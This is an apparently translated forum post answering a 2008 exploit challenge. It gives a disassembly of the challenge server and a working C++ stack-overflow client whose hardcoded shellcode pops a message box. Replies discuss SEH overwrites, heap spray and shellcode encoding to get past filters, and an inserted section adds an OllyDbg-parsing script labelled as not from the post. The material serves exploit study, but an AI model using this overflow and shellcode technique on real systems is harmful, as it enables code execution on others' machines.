[Original] My answers to the "ring out the old, ring in the new" exploit me challenge
Posted: 2008-1-2 07:06 9190


The submission deadline has passed, so I can post this and try to get it marked as a featured post. First, a disclaimer: I'm a layman when it comes to overflows, so these answers are not necessarily correct and are for reference only.

First, problem A. Open it in OD and look at the code at the EP:



No doubt about it, it's a standard VC6.0 build. OK, enough chit-chat.
Let's go straight to the code of main().

004010B0  /$  81EC B4030000 sub     esp, 3B4
004010B6  |.  8D8424 240200>lea     eax, dword ptr [esp+224]
004010BD  |.  55            push    ebp
004010BE  |.  50            push    eax                              ; /pWSAData
004010BF  |.  68 01010000   push    101                              ; |RequestedVersion = 101 (1.1.)
004010C4  |.  FF15 BC804000 call    dword ptr [<&WS2_32.#115>]       ; \WSAStartup
004010CA  |.  6A 00         push    0                                ; /Protocol = IPPROTO_IP
004010CC  |.  6A 01         push    1                                ; |Type = SOCK_STREAM
004010CE  |.  6A 02         push    2                                ; |Family = AF_INET
004010D0  |.  FF15 C0804000 call    dword ptr [<&WS2_32.#23>]        ; \socket
004010D6  |.  8BE8          mov     ebp, eax
004010D8  |.  85ED          test    ebp, ebp
004010DA  |.  7D 33         jge     short 0040110F
004010DC  |.  68 00914000   push    00409100                         ;  ASCII "socket creating error!"
004010E1  |.  55            push    ebp                              ; /Arg1
004010E2  |.  B9 689A4000   mov     ecx, 00409A68                    ; |
004010E7  |.  E8 0C070000   call    004017F8                         ; \exploit_.004017F8
004010EC  |.  8BC8          mov     ecx, eax
004010EE  |.  E8 34030000   call    00401427
004010F3  |.  68 D0124000   push    004012D0
004010F8  |.  6A 0A         push    0A                               ; /Arg1 = 0000000A
004010FA  |.  8BC8          mov     ecx, eax                         ; |
004010FC  |.  E8 DF010000   call    004012E0                         ; \exploit_.004012E0
00401101  |.  8BC8          mov     ecx, eax
00401103  |.  E8 A8010000   call    004012B0
00401108  |.  6A 01         push    1
0040110A  |.  E8 430E0000   call    00401F52
0040110F  |>  68 611E0000   push    1E61                             ; /NetShort = 1E61
00401114  |.  66:C74424 0C >mov     word ptr [esp+C], 2              ; |
0040111B  |.  FF15 C4804000 call    dword ptr [<&WS2_32.#9>]         ; \ntohs
00401121  |.  6A 00         push    0                                ; /NetLong = 0
00401123  |.  66:894424 0E  mov     word ptr [esp+E], ax             ; |
00401128  |.  FF15 C8804000 call    dword ptr [<&WS2_32.#8>]         ; \ntohl
0040112E  |.  8D4C24 08     lea     ecx, dword ptr [esp+8]
00401132  |.  6A 10         push    10                               ; /AddrLen = 10 (16.)
00401134  |.  51            push    ecx                              ; |pSockAddr
00401135  |.  55            push    ebp                              ; |Socket
00401136  |.  894424 18     mov     dword ptr [esp+18], eax          ; |
0040113A  |.  FF15 CC804000 call    dword ptr [<&WS2_32.#2>]         ; \bind
00401140  |.  85C0          test    eax, eax
00401142  |.  74 24         je      short 00401168
00401144  |.  68 E0904000   push    004090E0                         ;  ASCII "binding stream socket error!"
00401149  |.  B9 689A4000   mov     ecx, 00409A68
0040114E  |.  E8 D4020000   call    00401427
00401153  |.  68 D0124000   push    004012D0
00401158  |.  6A 0A         push    0A                               ; /Arg1 = 0000000A
0040115A  |.  8BC8          mov     ecx, eax                         ; |
0040115C  |.  E8 7F010000   call    004012E0                         ; \exploit_.004012E0
00401161  |.  8BC8          mov     ecx, eax
00401163  |.  E8 48010000   call    004012B0
00401168  |>  53            push    ebx
00401169  |.  68 B8904000   push    004090B8                         ;  ASCII "**************************************"
0040116E  |.  B9 689A4000   mov     ecx, 00409A68
00401173  |.  E8 AF020000   call    00401427
00401178  |.  68 D0124000   push    004012D0
0040117D  |.  6A 0A         push    0A                               ; /Arg1 = 0000000A
0040117F  |.  8BC8          mov     ecx, eax                         ; |
00401181  |.  E8 5A010000   call    004012E0                         ; \exploit_.004012E0
00401186  |.  8BC8          mov     ecx, eax
00401188  |.  E8 23010000   call    004012B0
0040118D  |.  68 94904000   push    00409094                         ;  ASCII "     exploit target server 1.0",TAB,"   "
00401192  |.  B9 689A4000   mov     ecx, 00409A68
00401197  |.  E8 8B020000   call    00401427
0040119C  |.  68 D0124000   push    004012D0
004011A1  |.  6A 0A         push    0A                               ; /Arg1 = 0000000A
004011A3  |.  8BC8          mov     ecx, eax                         ; |
004011A5  |.  E8 36010000   call    004012E0                         ; \exploit_.004012E0
004011AA  |.  8BC8          mov     ecx, eax
004011AC  |.  E8 FF000000   call    004012B0
004011B1  |.  68 B8904000   push    004090B8                         ;  ASCII "**************************************"
004011B6  |.  B9 689A4000   mov     ecx, 00409A68
004011BB  |.  E8 67020000   call    00401427
004011C0  |.  68 D0124000   push    004012D0
004011C5  |.  6A 0A         push    0A                               ; /Arg1 = 0000000A
004011C7  |.  8BC8          mov     ecx, eax                         ; |
004011C9  |.  E8 12010000   call    004012E0                         ; \exploit_.004012E0
004011CE  |.  8BC8          mov     ecx, eax
004011D0  |.  E8 DB000000   call    004012B0
004011D5  |.  6A 04         push    4                                ; /Backlog = 4
004011D7  |.  55            push    ebp                              ; |Socket
004011D8  |.  FF15 D0804000 call    dword ptr [<&WS2_32.#13>]        ; \listen
004011DE  |.  8D5424 08     lea     edx, dword ptr [esp+8]
004011E2  |.  8D4424 1C     lea     eax, dword ptr [esp+1C]
004011E6  |.  52            push    edx                              ; /pAddrLen
004011E7  |.  50            push    eax                              ; |pSockAddr
004011E8  |.  55            push    ebp                              ; |Socket
004011E9  |.  C74424 14 100>mov     dword ptr [esp+14], 10           ; |
004011F1  |.  FF15 D4804000 call    dword ptr [<&WS2_32.#1>]         ; \accept
004011F7  |.  8BD8          mov     ebx, eax
004011F9  |.  83FB FF       cmp     ebx, -1
004011FC  |.  74 7F         je      short 0040127D
004011FE  |.  56            push    esi
004011FF  |.  57            push    edi
00401200  |>  B9 80000000   /mov     ecx, 80
00401205  |.  33C0          |xor     eax, eax
00401207  |.  8D7C24 34     |lea     edi, dword ptr [esp+34]
0040120B  |.  50            |push    eax                             ; /Flags => 0
0040120C  |.  F3:AB         |rep     stos dword ptr es:[edi]         ; |
0040120E  |.  8D4C24 38     |lea     ecx, dword ptr [esp+38]         ; |
00401212  |.  68 00020000   |push    200                             ; |BufSize = 200 (512.)
00401217  |.  51            |push    ecx                             ; |Buffer
00401218  |.  53            |push    ebx                             ; |Socket
00401219  |.  FF15 D8804000 |call    dword ptr [<&WS2_32.#16>]       ; \recv
0040121F  |.  8BF0          |mov     esi, eax
00401221  |.  85F6          |test    esi, esi
00401223  |.  7D 26         |jge     short 0040124B
00401225  |.  68 74904000   |push    00409074                        ;  ASCII "reading stream message erro!"
0040122A  |.  B9 689A4000   |mov     ecx, 00409A68
0040122F  |.  E8 F3010000   |call    00401427
00401234  |.  68 D0124000   |push    004012D0
00401239  |.  6A 0A         |push    0A                              ; /Arg1 = 0000000A
0040123B  |.  8BC8          |mov     ecx, eax                        ; |
0040123D  |.  E8 9E000000   |call    004012E0                        ; \exploit_.004012E0
00401242  |.  8BC8          |mov     ecx, eax
00401244  |.  E8 67000000   |call    004012B0
00401249  |.  33F6          |xor     esi, esi
0040124B  |>  8D5424 34     |lea     edx, dword ptr [esp+34]
0040124F  |.  52            |push    edx
00401250  |.  E8 ABFDFFFF   |call    00401000
00401255  |.  83C4 04       |add     esp, 4
00401258  |.  85F6          |test    esi, esi
0040125A  |.^ 75 A4         |jnz     short 00401200
0040125C  |.  53            |push    ebx                             ; /Socket
0040125D  |.  FF15 DC804000 |call    dword ptr [<&WS2_32.#3>]        ; \closesocket
00401263  |.  8D4424 10     |lea     eax, dword ptr [esp+10]
00401267  |.  8D4C24 24     |lea     ecx, dword ptr [esp+24]
0040126B  |.  50            |push    eax                             ; /pAddrLen
0040126C  |.  51            |push    ecx                             ; |pSockAddr
0040126D  |.  55            |push    ebp                             ; |Socket
0040126E  |.  FF15 D4804000 |call    dword ptr [<&WS2_32.#1>]        ; \accept
00401274  |.  8BD8          |mov     ebx, eax
00401276  |.  83FB FF       |cmp     ebx, -1
00401279  |.^ 75 85         \jnz     short 00401200
0040127B  |.  5F            pop     edi
0040127C  |.  5E            pop     esi
0040127D  |>  68 64904000   push    00409064                         ;  ASCII "accept error!"
00401282  |.  B9 689A4000   mov     ecx, 00409A68
00401287  |.  E8 9B010000   call    00401427
0040128C  |.  68 D0124000   push    004012D0
00401291  |.  6A 0A         push    0A                               ; /Arg1 = 0000000A
00401293  |.  8BC8          mov     ecx, eax                         ; |
00401295  |.  E8 46000000   call    004012E0                         ; \exploit_.004012E0
0040129A  |.  8BC8          mov     ecx, eax
0040129C  |.  E8 0F000000   call    004012B0
004012A1  |.  FF15 E0804000 call    dword ptr [<&WS2_32.#116>]       ; [WSACleanup
004012A7  |.  5B            pop     ebx
004012A8  |.  5D            pop     ebp
004012A9  |.  81C4 B4030000 add     esp, 3B4
004012AF  \.  C3            retn

// exploitA.cpp : defines the entry point for the console application.
//

#include "stdafx.h"
#include <windows.h>
#include <stdio.h>
#include <winsock.h>
#pragma comment(lib, "wsock32.lib")

// 0x200-byte payload for problem A; the initializer is shorter than the
// array, so the remaining bytes are zero-filled
BYTE shellcode[0x200] =
{
	"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
	"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
	"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
	"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
	"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
	"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
	"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
	"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
	"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
	"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
	"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
	"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
	"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xED\x1E\x96\x7C"
	"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
	"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
	"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
	"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
	"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
	"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
	"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
	"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
	"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
	"\x53\x68\x6F\x68\x6F\x0A\x68\x62\x75\x67\x68\x8B\xC4\x53\x50\x50"
	"\x53\xFF\x57\xFC\x53\xFF\x57\xF8"
};
int _tmain(int argc, _TCHAR* argv[])
{
	WORD version;
	WSADATA wsaData;
	int rVal=0;

	version = MAKEWORD(1,1);

	WSAStartup(version,(LPWSADATA)&wsaData);

	LPHOSTENT hostEntry;

	//store information about the server
	hostEntry = gethostbyname("127.0.0.1");

	if(!hostEntry)
	{
		printf("Failed gethostbyname()");
		WSACleanup();
		return 0;
	}

	//create the socket
	SOCKET theSocket = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);

	//socket() reports failure with INVALID_SOCKET, not SOCKET_ERROR
	if(theSocket == INVALID_SOCKET)
	{
		printf("Failed socket()");
		WSACleanup();
		return 0;
	}

	//Fill in the sockaddr_in struct
	SOCKADDR_IN serverInfo;

	serverInfo.sin_family = PF_INET;
	serverInfo.sin_addr = *((LPIN_ADDR)*hostEntry->h_addr_list);

	//the server binds port 0x1E61 = 7777 (see the ntohs call in the listing)
	serverInfo.sin_port = htons(7777);

	rVal=connect(theSocket,(LPSOCKADDR)&serverInfo, sizeof(serverInfo));
	if(rVal==SOCKET_ERROR)
	{
		printf("Failed connect()");
		return 0;
	}
	//send the whole 0x200-byte array, the same size the server passes to recv()
	send(theSocket,(const char*)shellcode,0x200,0);
	closesocket(theSocket);
	WSACleanup();
	return 0;
}

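An added example (mine, not part of the post and not the challenge binary's code): a small parser for the OllyDbg listing format used above. It reads OllyDbg's own argument annotations ('/' marks the first pushed argument, '|' the following ones, '\' or '[' the resolved call), reverses each group into parameter order, and records the "add esp, N" cleanup after unannotated cdecl calls. Run over the recv loop from the listing, it recovers recv(Socket, Buffer, BufSize=512, Flags=0) and shows that the buffer is then handed to 00401000 with a single dword argument and no length, which is exactly the hand-off a reviewer would want to look at in the callee. The sample lines are copied from the listing; everything else is my own construction.

```python
"""Reconstruct the API call sequence from an OllyDbg listing (added example)."""
import re

INSTR_COL = 28  # column at which the mnemonic starts in OllyDbg's listing

# Constructed sample: lines copied from the recv loop in the listing above,
# plus the unannotated call that the received buffer is handed to.
SAMPLE = """\
00401200  |>  B9 80000000   /mov     ecx, 80
00401207  |.  8D7C24 34     |lea     edi, dword ptr [esp+34]
0040120B  |.  50            |push    eax                             ; /Flags => 0
0040120C  |.  F3:AB         |rep     stos dword ptr es:[edi]         ; |
0040120E  |.  8D4C24 38     |lea     ecx, dword ptr [esp+38]         ; |
00401212  |.  68 00020000   |push    200                             ; |BufSize = 200 (512.)
00401217  |.  51            |push    ecx                             ; |Buffer
00401218  |.  53            |push    ebx                             ; |Socket
00401219  |.  FF15 D8804000 |call    dword ptr [<&WS2_32.#16>]       ; \\recv
0040121F  |.  8BF0          |mov     esi, eax
0040124B  |>  8D5424 34     |lea     edx, dword ptr [esp+34]
0040124F  |.  52            |push    edx
00401250  |.  E8 ABFDFFFF   |call    00401000
00401255  |.  83C4 04       |add     esp, 4
"""

# 'BufSize = 200 (512.)' or 'Flags => 0': name, then a hex value
VALUE_RE = re.compile(r'^(\w+)\s*=>?\s*([0-9A-Fa-f]+)')


def split_line(line):
    """Return (address, mnemonic, operands, comment) for one listing line."""
    instr, _, comment = line[INSTR_COL:].partition(';')
    instr = instr.strip().lstrip('/|\\').strip()  # drop loop-bracket glyphs
    mnemonic, _, operands = instr.partition(' ')
    return line[:8], mnemonic, operands.strip(), comment.strip()


def parse_arg(body, operands):
    """Turn an OllyDbg argument annotation into (name, value).
    Values are hex; when the annotation carries none, fall back to the push
    operand (a hex immediate, or the register name kept as text)."""
    m = VALUE_RE.match(body)
    if m:
        return m.group(1), int(m.group(2), 16)
    name = body.split()[0] if body else None
    if operands[:1].isdigit() and re.fullmatch(r'[0-9A-Fa-f]+', operands):
        return name, int(operands, 16)
    return name, operands


def reconstruct_calls(listing):
    """Walk the listing and return one dict per call: address, callee name,
    arguments in parameter order, and the cdecl stack cleanup in bytes."""
    calls, pending, prev_call = [], [], None
    for line in listing.splitlines():
        if len(line) <= INSTR_COL:
            continue
        addr, mnemonic, operands, comment = split_line(line)
        marker, body = (comment[:1], comment[1:].strip()) if comment else ('', '')
        if mnemonic == 'push' and marker == '/':
            pending = [parse_arg(body, operands)]      # first argument pushed
        elif mnemonic == 'push' and marker == '|':
            pending.append(parse_arg(body, operands))  # further arguments
        elif mnemonic == 'call':
            if marker in ('\\', '['):                   # OllyDbg resolved the import
                name, args = body, list(reversed(pending))
            else:                                      # internal, unannotated target
                name, args = operands, []
            prev_call = {'addr': addr, 'name': name, 'args': args, 'cleanup': 0}
            calls.append(prev_call)
            pending = []
            continue
        elif mnemonic == 'add' and operands.startswith('esp,') and prev_call:
            # caller cleanup directly after a call: N bytes == N/4 dword args
            prev_call['cleanup'] = int(operands.split(',')[1].strip(), 16)
        prev_call = None
    return calls


def recv_buffer_sizes(calls):
    """Bytes each recv() may write, taken from OllyDbg's BufSize annotation."""
    return [dict(c['args'])['BufSize'] for c in calls if c['name'] == 'recv']


def consumer_after_recv(calls):
    """For each recv, the next cdecl call and its dword argument count.
    A consumer taking one pointer and no length must trust the data's own
    framing, so the callee is where the recv size has to be checked."""
    found = []
    for i, c in enumerate(calls):
        if c['name'] == 'recv':
            nxt = next((n for n in calls[i + 1:] if n['cleanup']), None)
            if nxt:
                found.append((nxt['name'], nxt['cleanup'] // 4))
    return found


if __name__ == '__main__':
    for c in reconstruct_calls(SAMPLE):
        print(c['addr'], c['name'], c['args'], 'cleanup=%d' % c['cleanup'])
```

The parser relies on OllyDbg's fixed column layout (mnemonic at column 28) and on its convention of prefixing hex values that start with a letter with 0, so register names never parse as numbers. Calls OllyDbg did not annotate get no arguments; only the cdecl cleanup that follows them is recorded, which is enough to see that 00401000 receives one dword.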
Replies (27)
#2
I got stuck on the character filtering, so I didn't finish problem 2. The answer to problem 2 above didn't pop up a window on my machine. After the overflow you can also overwrite the SEH and use the SEH to get jmp esp into eip; I found the spot too, I just didn't get the character filtering sorted out. Learned something this time.
2008-1-2 08:35
#3
WideCharToMultiByte is really annoying; it cost me a lot of time!
2008-1-2 08:52
#4
The code doesn't display correctly on the forum; try that online test.
2008-1-2 08:58
#5
Heh, I'm rooting for the OP in this contest.

Studying......
2008-1-2 09:02
#6
Studying!

This time it looks like you didn't use F5.
2008-1-2 09:25
#7
Studying

AppName: iexplore.exe         AppVer: 6.0.2900.2180         ModName: unknown
ModVer: 0.0.0.0         Offset: b15ff6ab
2008-1-2 09:26
#8
Studying... brilliant
2008-1-2 09:28
#9
I'm rooting for you
2008-1-2 09:35
#10
Did you take the subway back with 很黑?

I'm rooting for you too.

These 2 problems don't need F5.
2008-1-2 09:38
#11
I also found that it's pdg; google 7F5E27C1-4A5C-11D3-9232-0000B48A05B2
I'm a beginner and don't know how to debug this. Could you explain problem 2 in more detail? I don't get it.
2008-1-2 10:05
nop
#12
The simplest way around the character filtering is a heap spray,
or use unicode shellcode.
2008-1-2 10:13
#13
Studying, following this!!!!
2008-1-2 10:16
#14
I'm rooting for you too
2008-1-2 10:17
#15
Very good, very pleasant
2008-1-2 10:24
#16
You're all experts!! I'm still not that familiar with OD!! Once I'm done with that, I'll read the experts' post carefully.
2008-1-2 10:30
#17
Set a breakpoint on the DispCallFunc function in oleaut32.dll..

Learned a trick.
2008-1-2 10:36
#18
I got stuck at the same place. I never thought about doing overflows before; I found the vulnerability, but only when I started writing the SHELL did I realize it isn't that easy.
2008-1-2 12:09
#19
Not cross-platform; wchar isn't a problem, just use alpha2 or pgp encoding.
2008-1-2 12:12
#20
Studying
2008-1-2 13:04
#21
2008-1-2 13:06
#22
I wonder whether the OP tested this.
I found that in
void SetUserAuth(
                [in] BSTR UserName,
                [in] BSTR Password);
the 2nd parameter also has an overflow problem.
2008-1-2 14:07
#23
Waist good, waist happy
2008-1-2 14:32
#24
-.- OP, once you get the book, take a few photos with your phone and show us...
2008-1-2 14:51
#25
Which platform do you mean by cross-platform?

Encoding isn't a problem; just write a decoder.
2008-1-2 16:51